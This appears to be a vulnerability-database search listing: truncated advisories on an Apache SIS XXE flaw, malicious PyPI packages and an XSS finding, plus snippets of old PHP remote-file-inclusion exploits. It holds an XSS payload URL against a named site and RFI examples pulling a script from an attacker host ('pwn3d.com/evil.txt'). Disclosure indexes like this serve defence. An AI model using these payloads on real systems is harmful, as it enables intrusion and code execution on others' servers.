16 matches found
GHSA-JQMR-2PG9-VFX7 Apache SIS has Improper Restriction of XML External Entity Reference vulnerability
Improper Restriction of XML External Entity Reference vulnerability in Apache SIS. It is possible to write XML files in such a way that, when parsed by Apache SIS, an XML file reveals to the attacker the content of a local file on the server running Apache SIS. This vulnerability impacts the...
XML External Entity (XXE) Injection
Overview org.apache.sis.core:sis-metadata is an Implementations of metadata derived from ISO 19115. This module provides both an implementation of the metadata interfaces defined in GeoAPI, and a framework for handling those metadata through Java reflection. Affected versions of this package are...
CVE-2025-68280
Improper Restriction of XML External Entity Reference vulnerability in Apache SIS. It is possible to write XML files in such a way that, when parsed by Apache SIS, an XML file reveals to the attacker the content of a local file on the server running Apache SIS. This vulnerability impacts the...
CVE-2025-68280 Apache SIS: XML External Entity (XXE) vulnerability
Improper Restriction of XML External Entity Reference vulnerability in Apache SIS. It is possible to write XML files in such a way that, when parsed by Apache SIS, an XML file reveals to the attacker the content of a local file on the server running Apache SIS. This vulnerability impacts the...
CVE-2025-68280
CVE-2025-68280 affects Apache SIS versions 0.4–1.5. The issue is an improper restriction of XML External Entity (XXE) references, allowing an XML document to disclose content from the server’s local filesystem when parsed by SIS. Impacted services include reading GeoTIFFs with the GEO_METADATA ta...
CVE-2025-68280 Apache SIS: XML External Entity (XXE) vulnerability
Improper Restriction of XML External Entity Reference vulnerability in Apache SIS. It is possible to write XML files in such a way that, when parsed by Apache SIS, an XML file reveals to the attacker the content of a local file on the server running Apache SIS. This vulnerability impacts the...
Malicious code in x2vml-gml (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 c0a24139221a012c1dcb193331f49469571c2400d49c53489603dd68b26698e6 A campaign of probably pentest packages flooding PYPI. Installing the package or importing the module triggers reporting basic info like hostname, path and the...
Malicious code in v2mlx-gml (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 00b9359396313be6a33f8efe51b60793b58c9f0cb6d2862e074d4109c33c107f A campaign of probably pentest packages flooding PYPI. Installing the package or importing the module triggers reporting basic info like hostname, path and the...
MAL-2024-10361 Malicious code in v2mlx-gml (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 00b9359396313be6a33f8efe51b60793b58c9f0cb6d2862e074d4109c33c107f A campaign of probably pentest packages flooding PYPI. Installing the package or importing the module triggers reporting basic info like hostname, path and the...
Malicious code in v2xlm-gml (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 7fbdd4767b759c720bb13db759299986734471ff1064c52f7d25110c8e9aa617 A campaign of probably pentest packages flooding PYPI. Installing the package or importing the module triggers reporting basic info like hostname, path and the...
gml-hr.dk XSS vulnerability
Vulnerable URL: https://gml-hr.dk/?s=%27%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FOPENBUGBOUNTY%2F%29%3E〈=en Details: Description| Value ---|--- Patched:| No Latest check for patch:| 13.11.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 6664344 VIP website status:| ...
ActualAnalyzer Pro <= 6.88 (rf) Remote File Include Exploit
No description provided by source. ?php // No hard feelings ReZEN, I just post them when I get them. /str0ke / ActualAnalyzer Remote File Inclusion Exploit c0ded by ReZEN Sh0uts: xorcrew.net, ajax, gml, subterrain, D2K url: http://www.xorcrew.net/ReZEN example: turl: http://www.target.com/path to...
vBulletin ImpEx <= 1.74 Remote Command Execution Exploit
No description provided by source. ?php / vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN Sh0uts: xorcrew.net, ajax, gml, subterrain, My gf url: http://www.xorcrew.net/ReZEN example: turl: http://www.target.com/impex/ImpExData.php?systempath= hurl:http://www.pwn3d.com/evil.txt? / $cm...
ActualAnalyzer Pro 6.88 - rf Remote File Inclusion
ActualAnalyzer Pro 6.88 - rf Remote File Inclusion " ."turl:" ."hurl:" ."cmd:" ."" .""; if !isset$POST'submit' echo $form; else $file = fopen "test.txt", "w+"; fwrite$file, ""; fclose$file; $file = fopen $turl.$hurl, "r"; if !$file echo "Unable to get output.\n"; exit; echo $form; while !feof $fi...
ActualAnalyzer Pro <= 6.88 (rf) Remote File Include Exploit
No description provided by source. ?php // No hard feelings ReZEN, I just post them when I get them. /str0ke / ActualAnalyzer Remote File Inclusion Exploit c0ded by ReZEN Sh0uts: xorcrew.net, ajax, gml, subterrain, D2K url: http://www.xorcrew.net/ReZEN example: turl: http://www.target.com/path to...
vBulletin ImpEx <= 1.74 Remote Command Execution Exploit
No description provided by source. ?php / vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN Sh0uts: xorcrew.net, ajax, gml, subterrain, My gf url: http://www.xorcrew.net/ReZEN example: turl: http://www.target.com/impex/ImpExData.php?systempath= hurl:http://www.pwn3d.com/evil.txt? / $cm...